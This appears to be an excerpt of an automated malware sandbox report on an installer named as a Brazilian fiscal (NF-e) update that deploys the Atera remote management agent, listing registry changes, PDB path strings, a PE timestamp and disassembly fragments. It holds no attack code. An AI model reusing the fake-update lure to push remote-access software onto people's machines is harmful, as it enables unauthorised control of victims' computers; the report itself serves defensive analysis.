Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}

Jump to behavior

Source: Atualizador_Fiscal_NFe_37882912.msi

Static file information: File size 2994176 > 1048576

Source:	Binary string: \??\C:\Windows\dll\mscorlib.pdb# source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdbSHA256 source: AgentPackageMonitoring.exe, 00000024.00000002.2218327403.00000247F8A22000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb6 source: rundll32.exe, 0000003D.00000002.2638010865.00000000030A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635221045.00000000030A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb<$ source: AteraAgent.exe, 0000000C.00000000.1788379355.0000021679142000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: System.pdbN\|2h\|2 Z\|2_CorDllMainmscoree.dll source: rundll32.exe, 0000003D.00000002.2638010865.00000000030D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb source: AgentPackageAgentInformation.exe, 00000014.00000002.2037183161.0000028A55612000.00000002.00000001.01000000.00000018.sdmp, AgentPackageTicketing.exe, 00000031.00000002.2960467176.0000021F25452000.00000002.00000001.01000000.0000003E.sdmp, AgentPackageProgramManagement.exe, 00000036.00000002.2960570710.0000011CB2862000.00000002.00000001.01000000.0000003F.sdmp, AgentPackageHeartbeat.exe, 00000039.00000002.2573605708.000002A3326A2000.00000002.00000001.01000000.00000035.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.pdb# source: rundll32.exe, 0000003D.00000002.2641033184.0000000007300000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp, AgentPackageUpgradeAgent.exe, 0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003D.00000003.2635221045.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638010865.00000000030DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdbp+ source: AgentPackageMonitoring.exe, 00000024.00000002.2218789671.00000247F8AE2000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbd source: AgentPackageUpgradeAgent.exe, 0000002D.00000000.2421755187.0000019F9B462000.00000002.00000001.01000000.00000027.sdmp
Source:	Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent\obj\Release\AgentPackageUpgradeAgent.pdbdeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2217047581.00000247F80E2000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdb source: AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb8 source: AgentPackageProgramManagement.exe, 00000036.00000002.2960570710.0000011CB2862000.00000002.00000001.01000000.0000003F.sdmp
Source:	Binary string: C:\Windows\AlphaControlAgentInstallation.pdbpdbion.pdb- source: rundll32.exe, 0000003D.00000002.2641033184.0000000007300000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: HP7n\C:\Windows\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003D.00000002.2635872282.0000000000947000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdb source: rundll32.exe, 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \Windows\mscorlib.pdbpdblib.pdbEW source: AgentPackageSTRemote.exe, 00000021.00000002.3012686811.0000023072B30000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AlphaControlAgent\obj\Release\AteraAgent.pdb source: AteraAgent.exe, 0000000C.00000000.1788379355.0000021679142000.00000002.00000001.01000000.0000000F.sdmp
Source:	Binary string: ent.pdb0Pva source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdbq source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: E:\A\_work\533\obj\Microsoft.ApplicationInsights\Release\src\Microsoft.ApplicationInsights\net45\Microsoft.ApplicationInsights.pdb source: Microsoft.ApplicationInsights.dll.14.dr
Source:	Binary string: D:\a\1\s\AgentPackageInternalPoller\AgentPackageInternalPoller\obj\Release\AgentPackageInternalPoller.pdb source: AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdbSHA256mW source: AteraAgent.exe, 0000000E.00000002.2403751991.000001A5726F2000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: /_/src/ICSharpCode.SharpZipLib/obj/Release/net45/ICSharpCode.SharpZipLib.pdb source: AteraAgent.exe, 0000000E.00000002.2403751991.000001A5726F2000.00000002.00000001.01000000.00000026.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbVN'c source: rundll32.exe, 0000003D.00000002.2638010865.0000000003065000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635221045.0000000003065000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\AlphaControlAgentInstallation.pdble3q source: rundll32.exe, 0000003D.00000003.2635221045.00000000030DD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638010865.00000000030DD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA2567 source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2219808571.00000247F8C32000.00000002.00000001.01000000.00000024.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: dows\dll\mscorlib.pdbB source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\code\dapper-dot-net\Dapper\bin\Release\net45\Dapper.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2218601445.00000247F8AA2000.00000002.00000001.01000000.00000021.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb source: rundll32.exe, 0000003D.00000003.2635091236.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638518809.0000000003100000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635687238.00000000030FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageProgramManagement\AgentPackageProgramManagement\obj\Release\AgentPackageProgramManagement.pdb source: AgentPackageProgramManagement.exe, 00000036.00000000.2502915030.0000011CB23F2000.00000002.00000001.01000000.0000002B.sdmp
Source:	Binary string: C:\projects\nlog\src\NLog\obj\Release\net45\NLog.pdbSHA256d source: AgentPackageMonitoring.exe, 00000024.00000002.2219201094.00000247F8B52000.00000002.00000001.01000000.00000023.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageProgramManagement\ThirdPartyPackageManager\obj\Release\ThirdPartyPackageManager.pdb source: AgentPackageProgramManagement.exe, 00000036.00000002.2960100719.0000011CB2832000.00000002.00000001.01000000.0000003D.sdmp
Source:	Binary string: C:\projects\polly\src\Polly\obj\Release\netstandard1.1\Polly.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2218327403.00000247F8A22000.00000002.00000001.01000000.00000020.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageAgentInformation\AgentPackageAgentInformation\obj\Release\AgentPackageAgentInformation.pdb source: AteraAgent.exe, 0000000E.00000002.2397219667.000001A5723FC000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000000.2004500560.0000028A55182000.00000002.00000001.01000000.00000016.sdmp
Source:	Binary string: \??\C:\Windows\Installer\MSIF48E.tmp-\AlphaControlAgentInstallation.PDB source: rundll32.exe, 0000003D.00000002.2638010865.00000000030A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635221045.00000000030A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AlphaControlAgentInstallation\obj\Release\AlphaControlAgentInstallation.pdb source: rundll32.exe, 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638010865.00000000030D0000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: symbols\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: System.pdbh{ source: AteraAgent.exe, 00000018.00000002.2761360886.000002517A740000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdbSHA256 source: AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2037318779.0000028A55B72000.00000002.00000001.01000000.00000019.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2455163364.0000028A32100000.00000002.00000001.01000000.00000029.sdmp
Source:	Binary string: ]c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp
Source:	Binary string: D:\a\_work\1\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdbSHA256~ source: AteraAgent.exe, 00000018.00000002.2666352179.00000251005B4000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2666352179.00000251005F9000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: /_/Src/Newtonsoft.Json/obj/Release/net45/Newtonsoft.Json.pdb source: rundll32.exe, 00000003.00000003.1693514533.00000000049A5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000493B000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.0000000004A1C000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A50028E000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000000E.00000002.2356972366.000001A500611000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000468F000.00000004.00000020.00020000.00000000.sdmp, AgentPackageAgentInformation.exe, 00000014.00000002.2037318779.0000028A55B72000.00000002.00000001.01000000.00000019.sdmp, AgentPackageMonitoring.exe, 00000024.00000002.2219808571.00000247F8C32000.00000002.00000001.01000000.00000024.sdmp, AgentPackageUpgradeAgent.exe, 0000002F.00000002.2455163364.0000028A32100000.00000002.00000001.01000000.00000029.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AF6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048F1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2808350519.0000019FB46A2000.00000002.00000001.01000000.0000003B.sdmp, Microsoft.Win32.TaskScheduler.dll0.24.dr
Source:	Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdbTlnl `l_CorExeMainmscoree.dll source: AgentPackageTicketing.exe, 00000031.00000000.2473112434.0000021F24C42000.00000002.00000001.01000000.0000002A.sdmp
Source:	Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2808350519.0000019FB46A2000.00000002.00000001.01000000.0000003B.sdmp, Microsoft.Win32.TaskScheduler.dll0.24.dr
Source:	Binary string: D:\a\1\s\AgentPackageMonitoring\AgentPackageMonitoring\obj\Release\AgentPackageMonitoring.pdb source: AteraAgent.exe, 0000000E.00000002.2404597582.000001A572843000.00000004.00000020.00020000.00000000.sdmp, AteraAgent.exe, 00000018.00000002.2770892227.000002517AC04000.00000004.00000020.00020000.00000000.sdmp, AgentPackageMonitoring.exe, 00000024.00000000.2167789997.00000247F7742000.00000002.00000001.01000000.0000001B.sdmp
Source:	Binary string: \??\C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BDE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: C:\agent\_work\66\s\build\ship\x86\wixca.pdb source: Atualizador_Fiscal_NFe_37882912.msi
Source:	Binary string: PC:\Windows\AgentPackageUpgradeAgent.pdbP source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdb4X source: AgentPackageHeartbeat.exe, 00000039.00000002.2573605708.000002A3326A2000.00000002.00000001.01000000.00000035.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageHeartbeat\AgentPackageHeartbeat\obj\Release\AgentPackageHeartbeat.pdb source: AgentPackageHeartbeat.exe, 00000039.00000000.2523509578.000002A332342000.00000002.00000001.01000000.0000002D.sdmp
Source:	Binary string: c:\borrar\EmptyDll\Release\EmptyDll.pdb source: AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp
Source:	Binary string: C:\buildAgent\work\1b72bc6dac87fa71\code_drop\merge\chocolatey.pdb source: AgentPackageProgramManagement.exe, 00000036.00000002.3080346987.0000011CCC064000.00000002.00000001.01000000.00000044.sdmp
Source:	Binary string: dows\dll\System.pdb source: rundll32.exe, 0000003D.00000002.2641033184.0000000007300000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\agent\_work\66\s\build\obj\ship\x86\WindowsInstaller\Microsoft.Deployment.WindowsInstaller.pdbP source: rundll32.exe, 00000003.00000003.1693514533.0000000004974000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000003.1705697487.000000000490A000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1769078394.00000000049EB000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000011.00000003.1853750157.000000000465E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003C.00000003.2532481551.0000000004AC5000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2542669133.00000000048C0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\structuremap\src\StructureMap\obj\Release\net45\StructureMap.pdbSHA256`{f source: AgentPackageMonitoring.exe, 00000024.00000002.2217047581.00000247F80E2000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\s\Atera.AgentPackage.Common\obj\Release\Atera.AgentPackage.Common.pdbPf source: AgentPackageAgentInformation.exe, 00000014.00000002.2037183161.0000028A55612000.00000002.00000001.01000000.00000018.sdmp
Source:	Binary string: \??\C:\Windows\dll\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003D.00000002.2638010865.00000000030A8000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635221045.00000000030A8000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\AgentPackageUpgradeAgent.pdbpdbent.pdb8 source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: rundll32.exe, 0000003D.00000002.2638010865.00000000030D0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\AlphaControlAgentInstallation.pdbo@ca# source: rundll32.exe, 0000003D.00000002.2638415815.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635091236.00000000030F7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: pC:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: rolAgentInstallation.pdbn source: rundll32.exe, 0000003D.00000003.2635036820.0000000007358000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\A\_work\533\obj\Microsoft.ApplicationInsights\Release\src\Microsoft.ApplicationInsights\net45\Microsoft.ApplicationInsights.pdbCW source: Microsoft.ApplicationInsights.dll.14.dr
Source:	Binary string: mscorlib.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BDE0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\dev\sqlite\dotnet-private\bin\2012\x64\ReleaseNativeOnlyStatic\SQLite.Interop.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2231925001.00007FFDF0FDA000.00000002.00000001.01000000.0000001C.sdmp, AgentPackageMonitoring.exe, 00000026.00000002.2407710200.00007FFDF118C000.00000002.00000001.01000000.0000001C.sdmp, SQLite.Interop.dll.14.dr
Source:	Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdbSHA256 source: AteraAgent.exe, 0000000C.00000002.1848197535.000002167B6F2000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.PDB source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2782493129.0000007675CF3000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: D:\a\c-sharp\c-sharp\src\Api\PubnubApi\obj\Release\net45\Pubnub.pdb source: AteraAgent.exe, 0000000C.00000002.1848197535.000002167B6F2000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdb source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: c:\dev\sqlite\dotnet-private\obj\2012\System.Data.SQLite.2012\Release\System.Data.SQLite.pdb source: AgentPackageMonitoring.exe, 00000024.00000002.2218789671.00000247F8AE2000.00000002.00000001.01000000.00000022.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageTicketing\TicketingPackageExtensions\obj\Release\TicketingPackageExtensions.pdb source: AgentPackageTicketing.exe, 00000031.00000002.2959271020.0000021F24FC2000.00000002.00000001.01000000.0000003C.sdmp
Source:	Binary string: C:\agent\_work\66\s\build\ship\x86\SfxCA.pdb source: Atualizador_Fiscal_NFe_37882912.msi
Source:	Binary string: E:\A\_work\582\s\bin\obj\ref\System.Runtime.Serialization.Json\4.0.1.0\System.Runtime.Serialization.Json.pdb source: System.Runtime.Serialization.Json.dll.24.dr
Source:	Binary string: ?CnC:\Windows\Installer\MSIF48E.tmp-\AlphaControlAgentInstallation.pdb source: rundll32.exe, 0000003D.00000002.2635872282.0000000000947000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\exe\AgentPackageUpgradeAgent.pdb source: AgentPackageUpgradeAgent.exe, 0000002D.00000002.2792659060.0000019F9BE37000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.pdb! source: rundll32.exe, 0000003D.00000003.2635091236.00000000030F7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000002.2638518809.0000000003100000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000003D.00000003.2635687238.00000000030FF000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: E:\A\_work\156\s\corefx\bin\obj\AnyOS.AnyCPU.Release\System.Memory\netstandard1.1\System.Memory.pdbSHA256 source: AteraAgent.exe, 00000018.00000002.2666352179.0000025100727000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\s\AgentPackageTicketing\AgentPackageTicketing\obj\Release\AgentPackageTicketing.pdb source: AgentPackageTicketing.exe, 00000031.00000000.2473112434.0000021F24C42000.00000002.00000001.01000000.0000002A.sdmp

Source: BouncyCastle.Crypto.dll.1.dr

Static PE information: 0xE49A52B3 [Sun Jul 15 06:22:43 2091 UTC]

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

Code function: 36_2_00007FFDF0E91910 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

36_2_00007FFDF0E91910

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_3_04A557B8 push es; ret	4_3_04A55840
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_3_04A54E9C push es; ret	4_3_04A54EA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_3_04A55850 push es; ret	4_3_04A558C0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_3_06E884A1 push es; ret	4_3_06E884B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 4_3_06E84ECF push dword ptr [esp+ecx*2-75h]; ret	4_3_06E84ED3
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 14_2_00007FFD9B825930 push esp; retn 5F2Ch	14_2_00007FFD9B8262D9
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 14_2_00007FFD9B8263E8 push eax; ret	14_2_00007FFD9B826444
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 14_2_00007FFD9B827BCD push ss; ret	14_2_00007FFD9B827C17
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 17_3_04934ECF push dword ptr [esp+ecx*2-75h]; ret	17_3_04934ED3
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B627969 push ebx; retf	20_2_00007FFD9B62796A
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 20_2_00007FFD9B6100BD pushad ; iretd	20_2_00007FFD9B6100C1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 22_2_00007FFD9B6200BD pushad ; iretd	22_2_00007FFD9B6200C1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B636C18 pushad ; iretd	24_2_00007FFD9B636C19
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B62A654 push eax; retf	24_2_00007FFD9B62A669
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B62A658 push eax; retf	24_2_00007FFD9B62A669
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B6325F2 push eax; iretd	24_2_00007FFD9B632671
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Code function: 24_2_00007FFD9B83A911 push eax; ret	24_2_00007FFD9B83A934
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B617967 push ebx; retf	27_2_00007FFD9B61796A
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B6000BD pushad ; iretd	27_2_00007FFD9B6000C1
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Code function: 27_2_00007FFD9B602D95 push eax; ret	27_2_00007FFD9B602E1D
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B627C18 push eax; retf 5F4Ch	33_2_00007FFD9B627D6D
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B62D699 push es; retf	33_2_00007FFD9B62D847
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B617C2E pushad ; retf	33_2_00007FFD9B617C5D
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe	Code function: 33_2_00007FFD9B62C2BE pushad ; iretd	33_2_00007FFD9B62C2BF
